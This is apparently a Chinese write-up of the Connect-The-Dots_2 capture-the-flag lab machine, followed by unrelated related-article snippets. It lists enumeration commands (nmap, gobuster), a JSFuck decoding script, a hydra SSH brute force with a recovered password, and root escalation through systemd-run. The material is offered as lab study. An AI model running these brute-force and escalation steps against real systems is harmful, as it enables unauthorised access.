Connect-The-Dots_2

Connect-The-Dots_2

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.148

    arp-scan -l
    

    在这里插入图片描述

  • 端口扫描

    nmap -A -p- -sV 192.168.80.148
    
    开放端口
    21/tcp    open  ftp      vsftpd 2.0.8 or later
    80/tcp    open  http     Apache httpd 2.4.38 ((Debian))
    111/tcp   open  rpcbind  2-4 (RPC #100000)
    2049/tcp  open  nfs      3-4 (RPC #100003)
    7822/tcp  open  ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
    33741/tcp open  nlockmgr 1-4 (RPC #100021)
    39565/tcp open  mountd   1-3 (RPC #100005)
    56517/tcp open  mountd   1-3 (RPC #100005)
    58767/tcp open  mountd   1-3 (RPC #100005)
    

    在这里插入图片描述

二、信息收集

  • 访问80端口

    Happy Birthday brother!
    
    You know how our family have named us, right? Them naming me M and you N. Well, our names are entirely the same except the initials. Life is too short to save names in your memory when you're old, so why not! But do you know who did that? Our mother who was fond of the James Bond movies. She named me after her as M. Perhaps, she thinks that the director of the movie was too lazy to think of one. 
    
    I mean, who cares, right? Haha, I know you don't like me neither my pesky jokes. But I love you brother. So, don't visit this website until I am done. You'll find nothing but backups, lol.
    
    Btw, I know you love challenges so I have something in store for you as well.
    
    
    翻译
    生日快乐,兄弟!
    
    你知道我们家是怎么给我们取名的吧?他们叫我M,叫你n。嗯,我们的名字除了首字母外完全一样。生命太短暂了,当你老了的时候,为什么不把名字保存在你的记忆里呢?但你知道是谁干的吗?我们的母亲非常喜欢詹姆斯·邦德的电影。她以她的名字给我取名叫m。也许,她认为电影的导演太懒了,想不出一个名字。
    
    我是说,谁在乎呢?哈哈,我知道你不喜欢我,也不喜欢我那些讨厌的笑话。但是我爱你,兄弟。所以,在我完成之前不要访问这个网站。除了备份你什么都找不到,哈哈。
    
    顺便说一句,我知道你喜欢挑战,所以我也为你准备了一些东西。
    

    在这里插入图片描述

  • 路径扫描

    gobuster dir -u http://192.168.80.148 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 50
    
    路径
    /images               (Status: 301) [Size: 317] [--> http://192.168.80.148/images/]
    /manual               (Status: 301) [Size: 317] [--> http://192.168.80.148/manual/]
    /javascript           (Status: 301) [Size: 321] [--> http://192.168.80.148/javascript/]
    /backups              (Status: 200) [Size: 6301]
    /mysite               (Status: 301) [Size: 317] [--> http://192.168.80.148/mysite/]
    

    在这里插入图片描述

  • 访问/backups,就一个3s视频

    在这里插入图片描述

  • 访问/mysite,发现bootstrap.min.cs文件存在加密的东西

    在这里插入图片描述

  • 使用脚本将文件的字符串搞下来

    #coding=utf-8
    import requests
    import re
    
    req = requests.get("http://192.168.80.148/mysite/bootstrap.min.cs").text
    data = re.findall('\s=\s\"(.*?)\"',req)
    
    print("".join(data))
    
  • 进行JSfuck解码

    http://www.liminba.com/tool/jsfuckdecode/
    
    alert("You're smart enough to understand me. Here's your secret, TryToGuessThisNorris@2k19")
    
    TryToGuessThisNorris@2k19可能是密码
    

    在这里插入图片描述

三、NFS渗透

  • 因为开放了2049端口,获取 nfs 服务器的目录列列表

    showmount -e 192.168.80.148
    
    得到用户名 morris
    

    在这里插入图片描述

  • 尝试挂载共享目录,没成功

    mount -t nfs 192.168.80.148:/home/morris dots
    

    在这里插入图片描述

四、爆破SSH

  • 得到一个用户名为morris,根据主页的提示,应该还一个用户名norris,尝试ssh爆破

    用户名:
    morris
    norris
    Morris
    Norris
    
    密码:
    TryToGuessThisNorris@2k19
    
    hydra -L /tmp/user -p TryToGuessThisNorris@2k19 192.168.80.148 ssh -s 7822 -vV
    

    在这里插入图片描述

  • 登录ssh

    ssh norris@192.168.80.148 -p 7822
    

    在这里插入图片描述

    在这里插入图片描述

五、二次信息收集

  • 登录ftp下载文件

    ftp 192.168.80.148
    

    在这里插入图片描述

  • 查看图片信息,发现摩斯密码

    exiftool game.jpg.bak
    
    .... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ....... ..-. .- .-. .-.-.- ....... ..-. .- .-. ....... ..-. .- .-. ....... ..-. .-. --- -- ....... .... . .- ...- . -. ....... .-- .- -. -. .- ....... ... . . ....... .... . .-.. .-.. ....... -. --- .-- ..--.. ....... .... .- .... .- ....... -.-- --- ..- ....... ... ..- .-. . .-.. -.-- ....... -- .. ... ... . -.. ....... -- . --..-- ....... -.. .. -.. -. .----. - ....... -.-- --- ..- ..--.. ....... --- .... ....... -.. .- -- -. ....... -- -.-- ....... -... .- - - . .-. -.-- ....... .. ... ....... .- -... --- ..- - ....... - --- ....... -.. .. . ....... .- -. -.. ....... .. ....... .- -- ....... ..- -. .- -... .-.. . ....... - --- ....... ..-. .. -. -.. ....... -- -.-- ....... -.-. .... .- .-. --. . .-. ....... ... --- ....... --.- ..- .. -.-. -.- .-.. -.-- ....... .-.. . .- ...- .. -. --. ....... .- ....... .... .. -. - ....... .. -. ....... .... . .-. . ....... -... . ..-. --- .-. . ....... - .... .. ... ....... ... -.-- ... - . -- ....... ... .... ..- - ... ....... -.. --- .-- -. ....... .- ..- - --- -- .- - .. -.-. .- .-.. .-.. -.-- .-.-.- ....... .. ....... .- -- ....... ... .- ...- .. -. --. ....... - .... . ....... --. .- - . .-- .- -.-- ....... - --- ....... -- -.-- ....... -.. ..- -. --. . --- -. ....... .. -. ....... .- ....... .----. ... . -.-. .-. . - ..-. .. .-.. . .----. ....... .-- .... .. -.-. .... ....... .. ... ....... .--. ..- -... .-.. .. -.-. .-.. -.-- ....... .- -.-. -.-. . ... ... .. -... .-.. . .-.-.-
    

    在这里插入图片描述

  • 解码

    HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.
    
    诺里斯,你已经走了这么远了。远离天堂,现在想看看地狱吗?哈哈,你肯定想我了,是吗?哦,该死的,我的电池快没电了,我找不到充电器这么快,在系统自动关闭之前在这里留下一个提示。我将地下城的入口保存在一个公开访问的“秘密文件”中。
    

    在这里插入图片描述

  • 寻找morris密码,在/var/www/html目录下发现一个secretfile 文件

    I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.
    
    我看你是来要密码的。神圣的魔草!电池快没电了!!以下提及供参考。
    

    在这里插入图片描述

  • 查看所有文件,发现.secretfile.swp文件,swp 是编辑器突然断电或者 ctrl+z 产生的文件

    在这里插入图片描述

  • 将文件下载下来,发现密码blehguessme090

    在这里插入图片描述

  • 登录ssh

    morris:blehguessme090
    
    ssh morris@192.168.80.148 -p 7822
    

    在这里插入图片描述

六、权限提升

  • systemd-run提权

    systemd-run -t /bin/bash
    
    输入TryToGuessThisNorris@2k19
    

    在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/179552.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

前缀和——DP34 【模板】前缀和

文章目录 🍋1. 题目🍈2. 算法原理🍈3. 代码实现 🍋1. 题目 题目链接:【模板】前缀和_牛客题霸_牛客网 (nowcoder.com) 描述 给定一个长度为n的数组a1,a2,…an. 接下来有q次查询, 每次查询有两个参数l, r. 对于每个询…

基于ZLMediaKit的GB28181视频平台demo

GB28181 主要内容 国标的20位id是按照标准来定的,前8位是地域信息,9-10位是行业信息,11-13是设备类型、14是网络标识、后6位为序号 约定以SIP协议作为会话通道的使用标准,以RTP作为语言和视频的载体。联网系统在进行音视频传输及…

ui设计师简历自我评价的范文(合集)

ui设计师简历自我评价的范文篇一 本人毕业于艺术设计专业,具有较高的艺术素养,平时注重设计理论知识的积累,并将理论应用到作品中。了解当下设计的流行趋势,设计注重细节、重视用户体验,对色彩搭配有着浓厚的兴趣&…

简墨的进化之路:打造大模型数据计算系统的云存储底座

10月24日程序员节,「大模型数据计算系统」2023拓数派年度技术论坛在上海圆满落幕,拓数派大模型数据计算系统(PieDataComputingSystem,缩写:πDataCS)如约而至!πDataCS 以云原生技术重构数据存储…

私有化敏感词检测API服务wordscheck

之前有网友在找敏感词检测的应用,这个应该能满足他的需求; 什么是 wordscheck ? wordscheck 是敏感词检测 API,提供文本识别、智能鉴黄、涉政检测、谩骂等等敏感词检测过滤服务。 简介 敏感词库从大量样本库整理出来,…

Java 编码

编码: 加密: 通过加密算法和密钥进行 也可通过码表进行加密 对称加密: 缺点:可被截获 元数据---加密算法密钥密文 ----> 解密算法密钥元数据 算法:DES(短 56位),AES(长 128位)破解时间加长 非对称加密: 元数据-加密算法加密密钥 密文 --->加密算法解密密钥元数据 …

1.Qt5.15及其以上的下载

Qt5.15及其以上的下载 简介: ​ Qt是一个跨平台的C库,允许开发人员创建在不同操作系统(如Windows、macOS、Linux/Unix)和设备上具有本地外观和感觉的应用程序。Qt提供了一套工具和库,用于构建图形用户界面&#xff0…

CNVD-2023-12632:泛微E-cology9 browserjsp SQL注入漏洞复现 [附POC]

文章目录 泛微E-cology9 browserjsp SQL注入漏洞(CNVD-2023-12632)漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 泛微E-cology9 browserjsp SQL注入漏洞(CNVD-2023-12632)漏洞复现 [附POC] 0x…

JavaEE 多线程01

为什么引入多线程? 首先进程已经能很好的完成多任务这个情景下的并发编程了,那为什么又引入多线程呢? 这是因为在一些情景下,我么需要大量的创建和销毁进程来完成一些任务,此时多进程对系统的开销就会很大了. 假设有这样一个场景,服务器同时接收到很多个服务请求,这个时候服务…

数据挖掘 K近邻

什么时候用K近邻? 交叉验证的时候。最常见的交叉验证方法是K折交叉验证,其中数据集被均匀分成K个子集,称为折,然后执行K次训练和测试,每次选择不同的折作为测试集,其余的作为训练集。最后,将K次…

windows11快速输入时间和日期

windows11快速输入时间和日期 〇、赶时间的看这里 任务栏微软输入法图标右键 | 设置 | 词库和自学习 | 用户自定义短语 |添加或编辑自定义短语| 添加日期设置 %yyyy%-%MM%-%dd%时间设置 %yyyy%-%MM%-%dd% %HH%:%mm%:%ss%-------------------------------------------------…

ROS1创建自定义服务并使用

1.首先在功能包创建一个srv文件夹 如上图所示,vehicle_control是我的功能包,创建一个srv文件夹 2.使用touch指令创建服务文件 touch Ranging.srv3.在文件内输入服务数据 横线代表分割符,上面的是客户端发送的数据,下面是服务器…

【开源】基于Vue.js的民宿预定管理系统

项目编号: S 058 ,文末获取源码。 \color{red}{项目编号:S058,文末获取源码。} 项目编号:S058,文末获取源码。 目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 用例设计2.2 功能设计2.2.1 租客角色…

NX二次开发UF_CAM_set_clear_plane_data 函数介绍

文章作者:里海 来源网站:https://blog.csdn.net/WangPaiFeiXingYuan UF_CAM_set_clear_plane_data Defined in: uf_cam_planes.h int UF_CAM_set_clear_plane_data(tag_t object_tag, double origin [ 3 ] , double normal [ 3 ] ) overview 概述 De…

Altium Designer学习笔记9

忽视了一个最大的问题,就是元器件的封装,不应该是根据AD系统的封装走,而应该是根据立创商城上的规格书,确认每个封装的大小,画出封装图,然后才是布局和走线。 1、确认电容的封装采用0805,贴片电…

360:流氓or保家卫国的勇士?

你曾用过360吗,这个在国内名声不好的杀毒软件,却是令国外黑客闻风丧胆的存在。 首先,在电脑病毒刚兴起的年代,杀毒软件是要收费的,当时盛行的瑞星和金山就是采用的付费模式,而就在2006年,奇虎…

C++三大特性——继承

目录 一.继承的概念及定义 1.1继承的概念 1.2 继承定义 1.2.1定义格式 1.2.2继承关系和访问限定符​编辑 1.2.3继承基类成员访问方式的变化 二.基类和派生类对象赋值转换 三.继承中的作用域 四.派生类的默认成员函数 五.继承与友元 六.继承与静态成员 一.继承的概念及…

计算机网络之数据链路层

一、概述 1.1概述 物理层发出去的信号需要通过数据链路层才知道是否到达目的地;才知道比特流的分界线 链路(Link):从一个结点到相邻结点的一段物理线路,中间没有任何其他交换结点数据链路(Data Link):把实现通信协议的硬件和软件…

SpringBoot集成七牛云OSS详细介绍

📑前言 本文主要SpringBoot集成七牛云OSS详细介绍的文章,如果有什么需要改进的地方还请大佬指出⛺️ 🎬作者简介:大家好,我是青衿🥇 ☁️博客首页:CSDN主页放风讲故事 🌄每日一句&a…

电脑序列号查询

电脑序列号是厂商给每台电脑分配的一个产品识别码,也称为S/N(Serial Number)。主要用来查询电脑的出厂日期、保修状态、生产产地、产品配置等信息。电脑序列号查询有以下几种方法: 1、电脑机箱外壳; 2、系统信息/命令…